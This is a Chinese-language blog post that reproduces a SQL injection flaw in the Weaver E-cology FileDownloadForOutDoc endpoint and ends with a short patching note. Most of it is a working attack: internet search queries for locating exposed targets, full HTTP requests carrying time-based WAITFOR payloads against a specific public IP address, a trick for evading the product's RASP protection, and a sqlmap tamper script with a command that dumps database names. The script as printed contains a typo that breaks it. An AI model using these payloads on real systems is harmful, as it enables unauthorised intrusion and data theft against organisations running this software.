首页 > 数据库 >泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)

泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)

时间:2023-09-04 15:44:06浏览次数:78  
标签:random 15672 SQL cology 漏洞 537.36 2023 weaver 泛微

漏洞简介

泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

影响版本

Ecology 9.x 补丁版本 < 10.58.0;Ecology 8.x 补丁版本 < 10.58.0

漏洞复现

fofa查询语法:app="泛微-协同办公OA"
鹰图查询语法:app.name="泛微 e-cology 9.0 OA"
登录页面如下:

POC:

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 220.189.254.253:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid=123+WAITFOR+DELAY+'0:0:15'&isFromOutImg=1


因泛微 OA 启用了 RASP,同一个执行语句第二次注入就会被拦截,因此需要不断修改请求包。给出绕过的请求包:

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 220.189.254.253:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

加载tamper脚本进行注入

import os,re,random
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

priority = PRIORITY.HIGHEST

def tamper(payload, **kwargs):
	result = ""
	num = random.randint(1,2**27)
	result = str(num)+payload
	return resul

尝试注入:
python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

漏洞修复

目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。
https://www.weaver.com.cn/cs/securityDownload.asp#

标签:random,15672,SQL,cology,漏洞,537.36,2023,weaver,泛微
From: https://www.cnblogs.com/pursue-security/p/17677238.html

相关文章

  • 2023
    1mysql的可重复度并没有完全解决虚读幻读问题 如果是开启事务后,如果只有简单的select,那么它会触发快照读,为当前事务生成一个readview,后面的简单select也依旧会使用第一次生成的这个readview;如果当前事务中,要是做了update,或者select...forupdate,就会变成当前读,如果执行了upd......
  • 【漏洞复现】Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454
    一、Jeecg-Boot简介JeecgBoot是一款基于BPM的低代码平台!前后端分离架构SpringBoot2.x,SpringCloud,AntDesign&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式OnlineCoding->代码生成器->手工MERGE,......
  • 2023牛客多校训练营2
    B.LinkwithRailwayCompany最大权闭合子图问题,树链剖分建图求解简述最大权闭合子图:现有一有向图,所有点都有一个权值,你需要选择一个子图,使得子图所有点的出边都指向子图内部,问子图最大权考虑网络流,源点向所有正权点连流量为权值的边,所有负权点向汇点连流量为权值绝对值的边,......
  • 2023年超爆火的15款AI设计软件
    随着人工智能技术的快速发展,数字插画之外的“泛设计”行业的从业者也开始在AI中逐渐受益。可能很多设计师还停留在“AI设计软件只能做一些动漫风格插画”的认知中,实际上受到行业需求提升的刺激,软件厂商已经开始积极研究并发布更多针对特定行业和场景的软件产品。接下来的文章中,我们......
  • 领略全球前沿数字创新科技,尽在2023高交会IT展
    有人说,现在万物互联的时代背景下我们已经被“屏幕”拴住了眼球;也有人说,现在的我们已经打破了时空地域的壁垒,通过新一代信息技术编织的“信息网”将我们紧密联系在一起。这么看来,人类不自觉地由人工智能技术来掌管自己的身心,并潜移默化地影响着我们每天的行为方式和思维习惯。(2022高......
  • 2023.9.4值得推荐的一款服务器空间
    ,已经体验一个月咯,非常不错的免费资源,适合大家去了解了解~!他们家的免费空间,免费服务器,非常稳定,非常靠谱,值得拥有,价格厚道~!免备案服务,域名管理等等服务,应有尽有,2023年你值得了解,他们家的免费云服务器还是独立IP的哦,非常非常好,非常NICE~!官网地址:https://www.sanfengyun.com......
  • uniapp小程序隐私协议弹窗组件。自2023年9月15日起,对于涉及处理用户个人信息的小程序
    上代码 隐私组件代码直接复制就能用 <template> <viewclass="zero-privacy":class="[{'zero-bottom':position=='bottom'}]"v-if="showPrivacy"> <viewclass="zero-privacy-container":style="{&#......
  • 20230529 java.lang.reflect.InvocationHandler
    介绍java.lang.reflect.InvocationHandlerpublicinterfaceInvocationHandlerAPIpublicinvokeinvokeDefault调用接口的default方法......
  • 20230529 java.lang.reflect.AnnotatedElement
    介绍java.lang.reflect.AnnotatedElementpublicinterfaceAnnotatedElementAPIisAnnotationPresentgetAnnotationgetAnnotationsgetAnnotationsByTypegetDeclaredAnnotationgetDeclaredAnnotationsByTypegetDeclaredAnnotations......
  • 【2023-09-01】台风来咯
    20:00只有自己怀着希望的时候,才能把希望带给别人。越是艰难的时候,希望是唯一让你坚持下去的理由。                                                 ——阿兰“苏拉”......